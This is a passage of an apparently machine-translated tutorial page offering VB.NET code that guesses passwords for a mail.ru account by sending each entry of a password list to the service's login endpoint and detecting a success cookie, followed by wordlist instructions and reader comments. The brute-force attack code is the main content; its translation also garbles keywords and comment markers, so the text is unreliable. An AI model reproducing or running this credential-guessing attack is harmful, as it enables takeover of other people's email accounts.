Wenn txtLogin.Text<>"" Dann " Wenn Sie ein Login eingegeben haben, dann Dim i As Integer = 0 " Deklarieren Sie einen Zähler für die Suche For i = 0 To PassList.Count - 1 " Suchen, solange Passwörter vorhanden sind System.Threading.Thread.Sleep(1000) Dim Request As Net. HttpWebRequest = Net.HttpWebRequest.Create("http://win.mail.ru/cgi-bin/auth?Login=" & txtLogin.Text & "&Domain=" & Split(txtLogin.Text, "@ ")(1 ) _ & "&Password=" & PassList(i)) " Eine Anfrage erstellen Dim Response As Net.HttpWebResponse "Datenübertragungsmethode: Request.Method = "POST" "Automatische Übergänge verbieten Request.AllowAutoRedirect = False "Senden eine Anfrage Response = Request.GetResponse "Cookies prüfen If Response.Headers("Set-Cookie").IndexOf("Mpop") = 0 Then " Wenn es ein Mpop-Cookie gibt, dann MsgBox("Password selected: " + PassList( i)) „Das korrekte Passwort anzeigen Exit Sub“ Beenden Sie die Suche End If Next End If

Wenn etwas unklar ist, schreiben Sie mir. Ich hinterlasse unten meine Kontaktdaten.

Wir erstellen ein Passwortwörterbuch wie:

[Hier ist das richtige Passwort]

234411dsdfd

Kopieren Sie den roten Text und ändern Sie ihn in Ihr Passwort.

Wir verbinden alles mit dem Programm:

Klicken Sie hier, um mit der Suche zu beginnen.

Wenn Sie das Fenster „Passwort wurde ausgewählt“ sehen, funktioniert alles.

P.S. Entschuldigung für Tippfehler.

P.P.S. Wenn etwas nicht klar ist, dann schreiben Sie. Hilft immer gerne weiter!

Kommentare ()

Kulkhatsker

Ich gebe dir den Code!!! Was zum Teufel sind das denn für Leute?!

XeoN

Was zeichnet es aus??

Kulkhatsker

Also auf VB.NET übertragen. Verdammt, jeder schreibt alles zum Hacken. Wenn er es also nur geschrieben hätte, würde er auch versuchen, den Code hervorzuheben!

Eine große Bitte an die nächsten Generationen: WÄHLEN SIE DEN CODE NICHT AUS!!!

Artjom

Du bist eine Mist-Mega-Power

Quelllink

Poste zumindest die Quelle

DikusarKolia

Sehr nützliche Lektion :) Ich habe alles in Visual Basic 2008 gemacht, obwohl ich es ein wenig bearbeitet habe

Lesen:

Wie deaktiviere ich „Sie haben dich angerufen“ auf MTS? So melden Sie sich von Ihrem Play Market-Konto ab Wie füge ich eine Telefonnummer zur Blacklist in Nokia hinzu? Sony Xperia go – Technische Daten Android-Fragen So führen Sie Kontakte auf einem Samsung-Telefon zusammen